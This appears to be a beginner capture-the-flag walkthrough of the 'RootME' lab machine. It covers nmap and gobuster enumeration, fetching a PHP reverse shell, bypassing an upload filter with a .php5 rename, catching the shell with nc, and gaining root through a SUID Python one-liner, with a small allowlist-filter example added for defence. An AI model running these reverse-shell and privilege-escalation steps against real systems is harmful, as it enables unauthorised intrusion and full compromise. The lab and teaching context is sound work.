RootME
A ctf for beginners, can you root me?
Questions
Scan the machine, how many ports are open?
What version of Apache is running?
What is the hidden directory?
user.txt?
Search for files with SUID permission, which file is weird?
root.txt?
Enumeration
Nmap
nmap -sSVC -A -O -vv
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9irIQxn1jiKNjwLFTFBitstKOcP7gYt7HQsk6kyRQJjlkhHYuIaLTtt1adsWWUhAlMGl+97TsNK93DijTFrjzz4iv1Zwpt2hhSPQG0GibavCBf5GVPb6TitSskqpgGmFAcvyEFv6fLBS7jUzbG50PDgXHPNIn2WUoa2tLPSr23Di3QO9miVT3+TqdvMiphYaz0RUAD/QMLdXipATI5DydoXhtymG7Nb11sVmgZ00DPK+XJ7WB++ndNdzLW9525v4wzkr1vsfUo9rTMo6D6ZeUF8MngQQx5u4pA230IIXMXoRMaWoUgCB6GENFUhzNrUfryL02/EMt5pgfj8G7ojx5
| 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBERAcu0+Tsp5KwMXdhMWEbPcF5JrZzhDTVERXqFstm7WA/5+6JiNmLNSPrqTuMb2ZpJvtL9MPhhCEDu6KZ7q6rI=
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: HackIT - Home
Q: Scan the machine, how many ports are open?
A: 2
Q: What version of Apache is running?
A: 2.4.29
Q: What service is running on port 22?
A: ssh
Finding directories/files
gobuster dir -u http://10.10.63.255:80/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -t 33 -x html,php,txt
(the IP is different because I continued this writeup on another day)
Q: What is the hidden directory?
A: /panel/
Checking the directory /panel/, we have an upload form. Let's try to upload a shell.
shell: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
curl https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -o revs.php
Remember to start a listener on the port the shell will connect back to:
nc -lvp PORT
The upload is rejected with the message "PHP isn't permitted". The check only looks at the extension, so let's try bypassing it with the ".php5" extension:
mv revs.php revs.php5
It worked: the file is accepted. To run it, click on "veja" ("see").
The listener receives the connection and we have a shell.
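The reason the rename works is that the form denies a single extension instead of allowing a known-good set. As an added illustration (not the room's code; the real upload check is not visible on the page), here is a constructed blocklist filter of that kind next to an allowlist filter that rejects the same rename:

```python
import os

# Constructed blocklist in the style of the /panel/ upload check:
# it denies ".php" and nothing else.
BLOCKLIST = {"php"}

# Hardened alternative: the only extensions an image upload form should accept.
ALLOWLIST = {"jpg", "jpeg", "png", "gif"}


def blocklist_allows(filename: str) -> bool:
    """Vulnerable check: inspects only the final extension and denies 'php',
    so any other spelling the server still hands to PHP (e.g. 'php5') passes."""
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    return ext not in BLOCKLIST


def allowlist_allows(filename: str) -> bool:
    """Hardened check: the name must have at least one extension, and every
    extension segment must be in the allowlist. Checking every segment matters
    because AddHandler-style Apache configs can dispatch on any segment of the
    name, not just the last one."""
    parts = filename.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False
    return all(p in ALLOWLIST for p in parts[1:])


def compare(filename: str) -> dict:
    """Return what each filter decides for one upload name."""
    return {
        "name": filename,
        "blocklist": blocklist_allows(filename),
        "allowlist": allowlist_allows(filename),
    }


if __name__ == "__main__":
    # Constructed sample names, including the two used in the writeup.
    for name in ("photo.jpg", "revs.php", "revs.php5"):
        print(compare(name))
```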
To upgrade to a full TTY:
python -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo
fg
export TERM=xterm
user.txt
Finding it:
find / -type f -name user.txt 2>/dev/null
Reading it:
cat /var/www/user.txt
root.txt / Privilege Escalation
To look for the files with SUID permission we can use the command:
find / -type f -user root -perm -4000 2>/dev/null
The weird one is the Python binary: an interpreter should never carry the SUID bit, because any script it runs inherits root. With it set, a Python process can call setuid(0) and spawn a root shell:
python -c "import os;os.setuid(0);os.system('/bin/bash')"
Reading root.txt from the root shell: